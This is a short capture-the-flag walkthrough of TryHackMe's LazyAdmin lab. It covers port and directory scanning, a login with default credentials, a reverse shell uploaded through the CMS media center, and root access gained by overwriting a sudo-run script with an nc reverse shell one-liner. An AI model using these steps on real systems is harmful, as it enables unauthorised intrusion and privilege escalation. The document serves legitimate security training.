CTF Walk Through | HackProof Academy | [email protected]

2 subscriber(s)


05/12/2024 Shad Hussain Knowledge Views 197 Comments 0 Analytics Video English DMCA Add Favorite Copy Link
CTF Walk Through - LazyAdmin - THM

Room Link : https://tryhackme.com/r/room/lazyadmin STEP1 nmap 10.10.87.228 FINDING PORT STATE SERVICE 22/tcp open ssh 80/tcp open http -------------------------------------------------------------------------------------------------- STEP2 dirb http://10.10.87.228 FINDING == DIRECTORY: http://10.10.87.228/content/as/ == DIRECTORY: http://10.10.87.228/content/attachment/ -------------------------------------------------------------------------------------------------- STEP3 login in http://10.10.87.228/content/as/ manager password123 -------------------------------------------------------------------------------------------------- STEP4 visit : http://10.10.87.228/content/as/?type=media_center upload a reverse shell -- start the lister and http://10.10.87.228/content/attachment/ -- get the file and click to get tthe reverse shell -------------------------------------------------------------------------------------------------- STEP5 sudo -l FINDING (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl -------------------------------------------------------------------------------------------------- STEP6 cat /home/itguy/backup.pl FINDING #!/usr/bin/perl system("sh", "/etc/copy.sh"); -------------------------------------------------------------------------------------------------- STEP7 cat /etc/copy.sh FINDING rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&1|nc 192.0.0.0 5554 /tmp/f -------------------------------------------------------------------------------------------------- STEP8 cd /etc echo rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&1|nc 10.10.87.228 5554 /tmp/f copy.sh open nc -nvlp 5554 -- on new terminal -------------------------------------------------------------------------------------------------- STEP9 sudo /usr/bin/perl /home/itguy/backup.pl on new terminal you will get root shell -------------------------------------------------------------------------------------------------- whoami root cd /root cat root.txt --------------------------------------------------------------------------------------------------

Related articles

 WhatsApp no. else use your mail id to get the otp...!    Please tick to get otp in your mail id...!
 





© mutebreak.com | All Rights Reserved